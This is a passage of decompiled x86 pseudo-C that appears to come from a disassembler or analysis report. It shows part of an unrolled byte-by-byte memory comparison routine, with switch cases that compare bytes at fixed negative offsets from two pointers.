                                                                                                                							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
                                                                                                                								__esi = 0;
                                                                                                                								L131:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L132;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L124:
                                                                                                                								__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L126:
                                                                                                                									__esi =  *(__eax - 0x12) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L128:
                                                                                                                										__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L131;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L128;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L126;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L124;
                                                                                                                						case 0x15:
                                                                                                                							L201:
                                                                                                                							__edx =  *(__eax - 0x15);
                                                                                                                							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
                                                                                                                								__esi = 0;
                                                                                                                								L211:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L212;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L204:
                                                                                                                								__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L206:
                                                                                                                									__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L208:
                                                                                                                										__esi =  *(__eax - 0x12) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L211;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L208;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L206;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L204;
                                                                                                                						case 0x16:
                                                                                                                							L280:
                                                                                                                							__edx =  *(__eax - 0x16);
                                                                                                                							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
                                                                                                                								__esi = 0;
                                                                                                                								L290:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L291;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L283:
                                                                                                                								__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L285:
                                                                                                                									__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L287:
                                                                                                                										__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L290;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L287;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L285;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L283;
                                                                                                                						case 0x17:
                                                                                                                							L361:
                                                                                                                							__edx =  *(__eax - 0x17);
                                                                                                                							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
                                                                                                                								__esi = 0;
                                                                                                                								L371:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L372;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L364:
                                                                                                                								__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L366:
                                                                                                                									__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L368:
                                                                                                                										__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L371;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L368;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L366;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L364;
                                                                                                                						case 0x18:
                                                                                                                							L110:
                                                                                                                							__edx =  *(__eax - 0x18);
                                                                                                                							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
                                                                                                                								__esi = 0;
                                                                                                                								L120:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L121;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L113:
                                                                                                                								__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L115:
                                                                                                                									__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L117:
                                                                                                                										__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L120;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L117;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L115;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L113;
                                                                                                                						case 0x19:
                                                                                                                							L190:
                                                                                                                							__edx =  *(__eax - 0x19);
                                                                                                                							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
                                                                                                                								__esi = 0;
                                                                                                                								L200:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L201;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L193:
                                                                                                                								__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L195:
                                                                                                                									__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L197:
                                                                                                                										__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L200;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L197;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L195;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L193;
                                                                                                                						case 0x1a:
                                                                                                                							L269:
                                                                                                                							__edx =  *(__eax - 0x1a);
                                                                                                                							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
                                                                                                                								__esi = 0;
                                                                                                                								L279:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L280;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L272:
                                                                                                                								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L274:
                                                                                                                									__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L276:
                                                                                                                										__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L279;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L276;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L274;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L272;
                                                                                                                						case 0x1b:
                                                                                                                							L350:
                                                                                                                							__edx =  *(__eax - 0x1b);
                                                                                                                							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
                                                                                                                								__esi = 0;
                                                                                                                								L360:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L361;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L353:
                                                                                                                								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L355:
                                                                                                                									__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L357:
                                                                                                                										__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L360;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L357;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L355;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L353;
                                                                                                                						case 0x1c:
                                                                                                                							__edx =  *(__eax - 0x1c);
                                                                                                                							if( *(__eax - 0x1c) ==  *(__ecx - 0x1c)) {
                                                                                                                								__esi = 0;
                                                                                                                								L109:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L110;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L102:
                                                                                                                								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L104:
                                                                                                                									__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L106:
                                                                                                                										__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L109;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L106;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L104;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L102;
                                                                                                                						case 0x1d:
                                                                                                                							__edx =  *(__eax - 0x1d);
                                                                                                                							if( *(__eax - 0x1d) ==  *(__ecx - 0x1d)) {
                                                                                                                								__esi = 0;
                                                                                                                								L189:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L190;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L182:
                                                                                                                								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L184:
                                                                                                                									__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L186:
                                                                                                                										__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L189;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L186;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L184;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L182;
                                                                                                                						case 0x1e:
                                                                                                                							__edx =  *(__eax - 0x1e);
                                                                                                                							if( *(__eax - 0x1e) ==  *(__ecx - 0x1e)) {
                                                                                                                								__esi = 0;
                                                                                                                								L268:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L269;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L261:
                                                                                                                								__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L263:
                                                                                                                									__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L265:
                                                                                                                										__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L268;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L265;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L263;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L261;
                                                                                                                						case 0x1f:
                                                                                                                							__edx =  *(__eax - 0x1f);
                                                                                                                							if( *(__eax - 0x1f) ==  *(__ecx - 0x1f)) {
                                                                                                                								__esi = 0;
                                                                                                                								L349:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L350;
                                                                                                                							}
                                                                                                                							__edx =  *(__ecx - 0x1f) & 0x000000ff;
